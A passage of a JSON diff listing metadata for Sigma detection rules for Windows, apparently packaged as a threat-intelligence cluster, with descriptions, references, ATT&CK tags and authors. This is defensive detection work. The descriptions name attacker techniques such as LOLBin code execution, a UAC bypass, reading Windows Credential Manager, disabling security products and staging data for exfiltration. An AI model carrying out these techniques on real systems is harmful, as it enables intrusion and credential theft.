"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tscon_rdp_redirect.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1563.002", - "attack.t1021.001", - "car.2013-07-002" - ], - "creation_date": "2018/03/17", - "filename": "proc_creation_win_susp_tscon_rdp_redirect.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects indicators of a UAC bypass method by mocking directories", - "uuid": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", - "value": 
"TrustedPath UAC Bypass Pattern", - "meta": { - "refs": [ - "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e", - "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", - "https://github.com/netero1010/TrustedPath-UACBypass-BOF", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1548.002" - ], - "creation_date": "2021/08/27", - "filename": "proc_creation_win_susp_uac_bypass_trustedpath.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious child process of userinit", - "uuid": "b655a06a-31c0-477a-95c2-3726b83d649d", - "value": "Suspicious Userinit Child Process", - "meta": { - "refs": [ - "https://twitter.com/SBousseaden/status/1139811587760562176", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1055" - ], - "creation_date": "2019/06/17", - "filename": "proc_creation_win_susp_userinit_child.yml", - "author": "Florian Roth (rule), Samir Bousseaden (idea)", - "level": "medium", - "falsepositive": [ - "Administrative scripts" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of CSharp interactive console by PowerShell", - "uuid": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", - "value": "Suspicious Use of CSharp Interactive Console", - "meta": { - "refs": [ - "https://redcanary.com/blog/detecting-attacks-leveraging-the-net-framework/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_csharp_console.yml" - ], - "tags": [ - "attack.execution", - 
"attack.t1127" - ], - "creation_date": "2020/03/08", - "filename": "proc_creation_win_susp_use_of_csharp_console.yml", - "author": "Michael R. (@nahamike01)", - "level": "high", - "falsepositive": [ - "Possible depending on environment. Pair with other factors such as net connections, command-line args, etc." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", - "uuid": "0152550d-3a26-4efd-9f0e-54a0b28ae2f3", - "value": "Detection of PowerShell Execution via Sqlps.exe", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/", - "https://twitter.com/bryon_/status/975835709587075072", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_sqlps_bin.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1127" - ], - "creation_date": "2020/10/10", - "filename": "proc_creation_win_susp_use_of_sqlps_bin.yml", - "author": "Agro (@agro_sev) oscd.community", - "level": "medium", - "falsepositive": [ - "Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action." 
- ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", - "uuid": "a746c9b8-a2fb-4ee5-a428-92bee9e99060", - "value": "SQL Client Tools PowerShell Session Detection", - "meta": { - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OtherMSBinaries/Sqltoolsps.yml", - "https://twitter.com/pabraeken/status/993298228840992768", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_sqltoolsps_bin.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1127" - ], - "creation_date": "2020/10/13", - "filename": "proc_creation_win_susp_use_of_sqltoolsps_bin.yml", - "author": "Agro (@agro_sev) oscd.communitly", - "level": "medium", - "falsepositive": [ - "Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action." 
- ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces\nAdversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe\n", - "uuid": "634b00d5-ccc3-4a06-ae3b-0ec8444dd51b", - "value": "Malicious Windows Script Components File Execution by TAEF Detection", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/", - "https://twitter.com/pabraeken/status/993298228840992768", - "https://docs.microsoft.com/en-us/windows-hardware/drivers/taef/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml" - ], - "tags": [ - "attack.t1218" - ], - "creation_date": "2020/10/13", - "filename": "proc_creation_win_susp_use_of_te_bin.yml", - "author": "Agro (@agro_sev) oscd.community", - "level": "low", - "falsepositive": [ - "It's not an uncommon to use te.exe directly to execute legal TAEF tests" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "There is an option for a MS VS Just-In-Time Debugger \"vsjitdebugger.exe\" to launch specified executable and attach a debugger.\nThis option may be used adversaries to execute malicious code by signed verified binary.\nThe debugger is installed alongside with Microsoft Visual Studio package.\n", - "uuid": "15c7904e-6ad1-4a45-9b46-5fb25df37fd2", - "value": "Malicious PE Execution by Microsoft Visual Studio Debugger", - "meta": { - "refs": [ - "https://twitter.com/pabraeken/status/990758590020452353", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/", - "https://docs.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml" - ], - "tags": [ - "attack.t1218", - "attack.defense_evasion" - ], - "creation_date": "2020/10/14", - "filename": "proc_creation_win_susp_use_of_vsjitdebugger_bin.yml", - "author": "Agro (@agro_sev), Ensar \u015eamil (@sblmsrsn), oscd.community", - "level": "medium", - "falsepositive": [ - "The process spawned by vsjitdebugger.exe is uncommon." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe", - "uuid": "58f50261-c53b-4c88-bd12-1d71f12eda4c", - "value": "Windows Credential Manager Access via VaultCmd", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.004/T1555.004.md#atomic-test-1---access-saved-credentials-via-vaultcmd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vaultcmd.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1555.004" - ], - "creation_date": "2022/04/08", - "filename": "proc_creation_win_susp_vaultcmd.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect VBoxDrvInst.exe run with parameters allowing processing INF file.\nThis allows to create values in the registry and install drivers.\nFor example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys\n", - "uuid": "b7b19cb6-9b32-4fc4-a108-73f19acfe262", - "value": "Suspicious VBoxDrvInst.exe Parameters", - "meta": { - "refs": [ - 
"https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml", - "https://twitter.com/pabraeken/status/993497996179492864", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vboxdrvinst.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2020/10/06", - "filename": "proc_creation_win_susp_vboxdrvinst.yml", - "author": "Konstantin Grishchenko, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious inline VBScript keywords as used by UNC2452", - "uuid": "20c3f09d-c53d-4e85-8b74-6aa50e2f1b61", - "value": "Suspicious VBScript UN2452 Pattern", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vbscript_unc2452.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2021/03/05", - "filename": "proc_creation_win_susp_vbscript_unc2452.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects commands that temporarily turn off Volume Snapshots", - "uuid": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", - "value": "Disabled Volume Snapshots", - "meta": { - "refs": [ - "https://twitter.com/0gtweet/status/1354766164166115331", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_volsnap_disable.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": 
"2021/01/28", - "filename": "proc_creation_win_susp_volsnap_disable.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate administration" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter", - "uuid": "43103702-5886-11ed-9b6a-0242ac120002", - "value": "Suspicious Vsls-Agent Command With AgentExtensionPath Load", - "meta": { - "refs": [ - "https://twitter.com/bohops/status/1583916360404729857", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vslsagent_agentextensionpath_load.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2022/10/30", - "filename": "proc_creation_win_susp_vslsagent_agentextensionpath_load.yml", - "author": "bohops", - "level": "medium", - "falsepositive": [ - "False positives depend on custom use of vsls-agent.exe" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "A General detection for svchost.exe spawning rundll32.exe with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie.\nThis could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server).\n", - "uuid": "2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5", - "value": "Suspicious WebDav Client Execution", - "meta": { - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/17", - "https://threathunterplaybook.com/evals/apt29/detections/7.B.4_C10730EA-6345-4934-AA0F-B0EFCA0C4BA6.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_webdav_client_execution.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003" - ], - "creation_date": "2020/05/02", - "filename": 
"proc_creation_win_susp_webdav_client_execution.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)", - "uuid": "60bfeac3-0d35-4302-8efb-1dd16f715bc6", - "value": "Suspicious SysAidServer Child", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_web_sysaidserver.yml" - ], - "tags": "No established tags", - "creation_date": "2022/08/26", - "filename": "proc_creation_win_susp_web_sysaidserver.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", - "uuid": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", - "value": "Suspicious WERMGR Process Patterns", - "meta": { - "refs": [ - "https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html", - "https://www.echotrail.io/insights/search/wermgr.exe", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wermgr.yml" - ], - "tags": "No established tags", - "creation_date": "2022/10/14", - "filename": "proc_creation_win_susp_wermgr.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": 
"Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n", - "uuid": "725a9768-0f5e-4cb3-aec2-bc5719c6831a", - "value": "Suspicious Where Execution", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_where_execution.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1217" - ], - "creation_date": "2021/12/13", - "filename": "proc_creation_win_susp_where_execution.yml", - "author": "frack113, Nasreddine Bencherchali", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation but rarely used by administrators", - "uuid": "e28a5a99-da44-436d-b7a0-2afc20a5f413", - "value": "Whoami Execution", - "meta": { - "refs": [ - "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", - "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" - ], - "creation_date": "2018/08/13", - "filename": "proc_creation_win_susp_whoami.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" - ], - "logsource.category": "process_creation", - 
"logsource.product": "windows" - } - }, - { - "description": "Detects the execution of whoami with suspicious parents or parameters", - "uuid": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", - "value": "Whoami Execution Anomaly", - "meta": { - "refs": [ - "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", - "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", - "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami_anomaly.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" - ], - "creation_date": "2021/08/12", - "filename": "proc_creation_win_susp_whoami_anomaly.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. 
used by EfsPotato)", - "uuid": "e9142d84-fbe0-401d-ac50-3e519fb00c89", - "value": "WhoAmI as Parameter", - "meta": { - "refs": [ - "https://twitter.com/blackarrowsec/status/1463805700602224645?s=12", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami_as_param.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" - ], - "creation_date": "2021/11/29", - "filename": "proc_creation_win_susp_whoami_as_param.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious winrar execution that involves a file with a .dmp extension, which could be a step in a process of dump file exfiltration", - "uuid": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", - "value": "Winrar Compressing Dump Files", - "meta": { - "refs": [ - "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrar_dmp.yml" - ], - "tags": [ - "attack.collection", - "attack.t1560.001" - ], - "creation_date": "2022/01/04", - "filename": "proc_creation_win_susp_winrar_dmp.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", - "uuid": "4ede543c-e098-43d9-a28f-dd784a13132f", - "value": "Winrar Execution in Non-Standard Folder", - "meta": { - "refs": [ - "https://twitter.com/cyb3rops/status/1460978167628406785", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrar_execution.yml" - ], - "tags": [ - "attack.collection", - "attack.t1560.001" - ], - "creation_date": "2021/11/17", - "filename": "proc_creation_win_susp_winrar_execution.yml", - "author": "Florian Roth, Tigzy", - "level": "high", - "falsepositive": [ - "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", - "uuid": "074e0ded-6ced-4ebd-8b4d-53f55908119d", - "value": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl", - "meta": { - "refs": [ - "https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrm_awl_bypass.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ], - "creation_date": "2020/10/06", - "filename": "proc_creation_win_susp_winrm_awl_bypass.yml", - "author": "Julia Fomina, oscd.community", - "level": "medium", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects an attempt to execute code or create service on remote host via winrm.vbs.", - "uuid": "9df0dd3a-1a5c-47e3-a2bc-30ed177646a0", - "value": "Remote Code Execute via Winrm.vbs", - "meta": { - "refs": [ - "https://twitter.com/bohops/status/994405551751815170", - "https://redcanary.com/blog/lateral-movement-winrm-wmi/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrm_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ], - "creation_date": 
"2020/10/07", - "filename": "proc_creation_win_susp_winrm_execution.yml", - "author": "Julia Fomina, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate use for administartive purposes. Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", - "uuid": "e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d", - "value": "Compress Data and Lock With Password for Exfiltration With WINZIP", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winzip.yml" - ], - "tags": [ - "attack.collection", - "attack.t1560.001" - ], - "creation_date": "2021/07/27", - "filename": "proc_creation_win_susp_winzip.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects WMIC executions in which a event consumer gets created in order to establish persistence", - "uuid": "ebef4391-1a81-4761-a40a-1db446c0e625", - "value": "Suspicious WMIC ActiveScriptEventConsumer Creation", - "meta": { - "refs": [ - "https://twitter.com/johnlatwc/status/1408062131321270282?s=12", - "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_eventconsumer_create.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.003" - ], - "creation_date": "2021/06/25", - "filename": "proc_creation_win_susp_wmic_eventconsumer_create.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate 
software creating script event consumers" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects WMIC executing suspicious or recon commands", - "uuid": "526be59f-a573-4eea-b5f7-f0973207634d", - "value": "Suspicious WMIC Execution", - "meta": { - "refs": [ - "https://digital-forensics.sans.org/blog/2010/06/04/wmic-draft/", - "https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1", - "https://blog.malwarebytes.com/threat-analysis/2016/04/rokku-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_execution.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047", - "car.2016-03-002" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_susp_wmic_execution.yml", - "author": "Michael Haag, Florian Roth, juju4, oscd.community", - "level": "medium", - "falsepositive": [ - "If using Splunk, we recommend | stats count by Computer,CommandLine following for easy hunting by Computer/CommandLine" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\"...etc", - "uuid": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", - "value": "Suspicious WMIC Execution - ProcessCallCreate", - "meta": { - "refs": [ - "https://thedfirreport.com/2020/10/08/ryuks-return/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ], - "creation_date": "2020/10/12", - "filename": "proc_creation_win_susp_wmic_proc_create.yml", - "author": "Florian Roth, Nasreddine Bencherchali", - 
"level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects uninstallation or termination of security products using the WMIC utility", - "uuid": "847d5ff3-8a31-4737-a970-aeae8fe21765", - "value": "Wmic Uninstall Security Product", - "meta": { - "refs": [ - "https://twitter.com/cglyer/status/1355171195654709249", - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", - "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", - "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_security_product_uninstall.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2021/01/30", - "filename": "proc_creation_win_susp_wmic_security_product_uninstall.yml", - "author": "Florian Roth, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Legitimate administration" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", - "uuid": "0bbc6369-43e3-453d-9944-cae58821c173", - "value": "Execution via WorkFolders.exe", - "meta": { - "refs": [ - "https://twitter.com/elliotkillick/status/1449812843772227588", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_workfolders.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2021/10/21", - "filename": "proc_creation_win_susp_workfolders.yml", - "author": "Maxime Thiebaut (@0xThiebaut)", - "level": "high", - "falsepositive": [ - "Legitimate usage of the uncommon Windows Work Folders feature." 
- ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects code execution via the Windows Update client (wuauclt)", - "uuid": "d7825193-b70a-48a4-b992-8b5b3015cc11", - "value": "Windows Update Client LOLBIN", - "meta": { - "refs": [ - "https://dtm.uk/wuauclt/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wuauclt.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.t1105", - "attack.t1218" - ], - "creation_date": "2020/10/17", - "filename": "proc_creation_win_susp_wuauclt.yml", - "author": "FPT.EagleEye Team", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", - "uuid": "52d097e2-063e-4c9c-8fbb-855c8948d135", - "value": "Suspicious Windows Update Agent Empty Cmdline", - "meta": { - "refs": [ - "https://redcanary.com/blog/blackbyte-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wuauclt_cmdline.yml" - ], - "tags": "No established tags", - "creation_date": "2022/02/26", - "filename": "proc_creation_win_susp_wuauclt_cmdline.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.", - "uuid": "90dcf730-1b71-4ae7-9ffc-6fcf62bd0132", - "value": "Suspicious ZipExec Execution", - "meta": { - "refs": [ - "https://twitter.com/SBousseaden/status/1451237393017839616", - "https://github.com/Tylous/ZipExec", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_zipexec.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" - ], - "creation_date": "2021/11/07", - "filename": "proc_creation_win_susp_zipexec.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", - "uuid": "85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98", - "value": "Zip A Folder With PowerShell For Staging In Temp", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_zip_compress.yml" - ], - "tags": [ - "attack.collection", - "attack.t1074.001" - ], - "creation_date": "2021/07/20", - "filename": "proc_creation_win_susp_zip_compress.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", - "uuid": "0a13e132-651d-11eb-ae93-0242ac130002", - "value": "Suspicious Auditpol Usage", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sus_auditpol_usage.yml" - ], - "tags": 
